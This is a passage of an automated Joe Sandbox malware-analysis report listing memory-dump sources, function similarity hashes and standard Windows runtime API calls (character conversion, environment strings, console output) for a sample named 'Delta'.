                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: AdjustPointer
                                                                                          • String ID:
                                                                                          • API String ID: 1740715915-0
                                                                                          • Opcode ID: 964bdf51fb866233385926e2dc07fa998035440be73ce649b23c557ff8bf0d04
                                                                                          • Instruction ID: e5afe5a909e1708bece98ad2b67a295fdd7718b937fa8ab0a1fa2eab2db965e2
                                                                                          • Opcode Fuzzy Hash: 964bdf51fb866233385926e2dc07fa998035440be73ce649b23c557ff8bf0d04
                                                                                          • Instruction Fuzzy Hash: CC51BD7260420A9FDB298F15D885BBBBFA5FF40311F144929EA558B292E739EC40CF90
                                                                                          APIs
                                                                                            • Part of subcall function 005F5801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,005F6FD5,?,00000000,-00000008), ref: 005F5862
                                                                                          • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 005FB5DA
                                                                                          • __dosmaperr.LIBCMT ref: 005FB5E1
                                                                                          • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 005FB61B
                                                                                          • __dosmaperr.LIBCMT ref: 005FB622
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 1913693674-0
                                                                                          • Opcode ID: 22fa6a46dbdf54d7afc27e740296dac6c9c854c5910d26f5f90b73d19b92c6f7
                                                                                          • Instruction ID: c49f72e525347cdccc3fae3c8e0b98b68a230e39773173121f91d30e833e33c0
                                                                                          • Opcode Fuzzy Hash: 22fa6a46dbdf54d7afc27e740296dac6c9c854c5910d26f5f90b73d19b92c6f7
                                                                                          • Instruction Fuzzy Hash: 1121C87164060EEFEB10AF65C88487BBFA9FF403647148918FA15D7250E739EC408B60
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a3066158a8f3f63875ddf91f6868d335d9d5c417abe0e7caa3acc9d89fe2aae7
                                                                                          • Instruction ID: ea89dab92a0afd5ef0a8adf09d3978342be73db379b71aea8f7b963b23b921ed
                                                                                          • Opcode Fuzzy Hash: a3066158a8f3f63875ddf91f6868d335d9d5c417abe0e7caa3acc9d89fe2aae7
                                                                                          • Instruction Fuzzy Hash: 2C21017220024EAFDB28EF66CC4596B7FA8FF803287148824F995C7140E730EC428760
                                                                                          APIs
                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 005FC976
                                                                                            • Part of subcall function 005F5801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,005F6FD5,?,00000000,-00000008), ref: 005F5862
                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005FC9AE
                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005FC9CE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 158306478-0
                                                                                          • Opcode ID: 0898260b110ecf406231476a45f7e649cb8978464c3357de7f0a4eff3ec9c868
                                                                                          • Instruction ID: fb9afcdc214f69860afa9e41db91e9ed0a2b7e03c35a873c064322beb9e3a779
                                                                                          • Opcode Fuzzy Hash: 0898260b110ecf406231476a45f7e649cb8978464c3357de7f0a4eff3ec9c868
                                                                                          • Instruction Fuzzy Hash: F911C0F2901A1E7FA71167B65E8DC7FAE9CFE853E43100825FB42E2101FA69ED0185B0
                                                                                          APIs
                                                                                          • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,006039DF,00000000,00000001,?,?,?,005FDB40,?,00000000,00000000), ref: 006044A7
                                                                                          • GetLastError.KERNEL32(?,006039DF,00000000,00000001,?,?,?,005FDB40,?,00000000,00000000,?,?,?,005FD486,?), ref: 006044B3
                                                                                            • Part of subcall function 00604510: CloseHandle.KERNEL32(FFFFFFFE,006044C3,?,006039DF,00000000,00000001,?,?,?,005FDB40,?,00000000,00000000,?,?), ref: 00604520
                                                                                          • ___initconout.LIBCMT ref: 006044C3
                                                                                            • Part of subcall function 006044E5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00604481,006039CC,?,?,005FDB40,?,00000000,00000000,?), ref: 006044F8
                                                                                          • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,006039DF,00000000,00000001,?,?,?,005FDB40,?,00000000,00000000,?), ref: 006044D8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                          • String ID:
                                                                                          • API String ID: 2744216297-0
                                                                                          • Opcode ID: 6da3842649e4d8930f741f9357833d346d537ee241559651f353b606306c7cef
                                                                                          • Instruction ID: 3dfad016b6d35c8fa859c5afee4e6fe09de3ac19568723d64df7b14aa43bda4f
                                                                                          • Opcode Fuzzy Hash: 6da3842649e4d8930f741f9357833d346d537ee241559651f353b606306c7cef
                                                                                          • Instruction Fuzzy Hash: 59F03036081124BBCF765FD6EC48ACB3F67FB493A0B058410FB1885170DA3289609B94
                                                                                          APIs
                                                                                            • Part of subcall function 005F594A: GetLastError.KERNEL32(00000000,?,005F7CCD), ref: 005F594E
                                                                                            • Part of subcall function 005F594A: SetLastError.KERNEL32(00000000,?,?,00000028,005F1F93), ref: 005F59F0
                                                                                          • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,005EF809,?,?,?,00000055,?,-00000050,?,?,?), ref: 005FA1E5
                                                                                          • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,005EF809,?,?,?,00000055,?,-00000050,?,?), ref: 005FA21C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$CodePageValid
                                                                                          • String ID: utf8
                                                                                          • API String ID: 943130320-905460609
                                                                                          • Opcode ID: e0a839c5e40fc195548519b154c33770e3712c7a7ebbb924fc40b28284a436b2
                                                                                          • Instruction ID: 7c72d6a4e435789be67bb092f3d7442a98be850430571e2303c5ea0cfb779f7e
                                                                                          • Opcode Fuzzy Hash: e0a839c5e40fc195548519b154c33770e3712c7a7ebbb924fc40b28284a436b2
                                                                                          • Instruction Fuzzy Hash: 8A51D5B1A0070EAAE725AB70CC46FB67BA9BF44700F154829E74D970C2E778E940C663
                                                                                          APIs
                                                                                          • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,005F5071,?,?,00000000,00000000,00000000,?), ref: 005F5195
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: EncodePointer
                                                                                          • String ID: MOC$RCC
                                                                                          • API String ID: 2118026453-2084237596
                                                                                          • Opcode ID: 40665c04f800be231fb798318d72fdd8da67c94ebfb821d6d117f48cb7fdc5c6
                                                                                          • Instruction ID: b6df5fbc624bbd1e432896dc878d28111ec64253e656771351f9964f64d1e311
                                                                                          • Opcode Fuzzy Hash: 40665c04f800be231fb798318d72fdd8da67c94ebfb821d6d117f48cb7fdc5c6
                                                                                          • Instruction Fuzzy Hash: 3E41887590060DAFCF15CF94CD85AAEBFB5FF48300F188259FB08A6212E339A950DB51
                                                                                          APIs
                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 005F4C53
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: ___except_validate_context_record
                                                                                          • String ID: csm$csm
                                                                                          • API String ID: 3493665558-3733052814
                                                                                          • Opcode ID: b0089d0a38f5e6b817c3f2ea62f4766f2ee95a21c95e128898fbd2dac5879dd4
                                                                                          • Instruction ID: ec501d61f067b68109984557efce041eedb3553d65fb43f4b3a7c351872468ca
                                                                                          • Opcode Fuzzy Hash: b0089d0a38f5e6b817c3f2ea62f4766f2ee95a21c95e128898fbd2dac5879dd4
                                                                                          • Instruction Fuzzy Hash: 7331CC3250121DABCF269F54CC049BB7F66FF48315B19865AFA548E221C33ACCA1DF81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000003.2328527402.0000000002C35000.00000004.00000020.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                                                          • Associated: 00000002.00000003.1756296005.0000000002C30000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_3_2c30000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a502a3d4acbe2eab7fb8ba42e692865dc48fa7bf80e7f44912651fa3bf0bc598
                                                                                          • Instruction ID: 451586feafbc2f9418bc682b32eb8818dc7fe928e697b82f2ea99de8301abb4f
                                                                                          • Opcode Fuzzy Hash: a502a3d4acbe2eab7fb8ba42e692865dc48fa7bf80e7f44912651fa3bf0bc598
                                                                                          • Instruction Fuzzy Hash: CAA022C30000802AE3E30308C83B2823FE0BCC233830E08C082000BB33F0E08002C2C8